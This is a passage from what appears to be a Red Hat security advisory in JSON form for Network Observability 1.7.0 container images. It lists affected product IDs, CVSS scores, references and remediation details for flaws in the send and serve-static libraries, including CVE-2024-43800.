"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8014"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "send: Code Execution Vulnerability in Send Library"
},
{
"cve": "CVE-2024-43800",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:33.631718+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311154"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "serve-static: Improper Sanitization in serve-static",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43800"
},
{
"category": "external",
"summary": "RHBZ#2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43800",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43800"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b",
"url": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa",
"url": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p",
"url": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p"
}
],
"release_date": "2024-09-10T15:15:17.937000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-22T01:05:39+00:00",
"details": "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8014"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
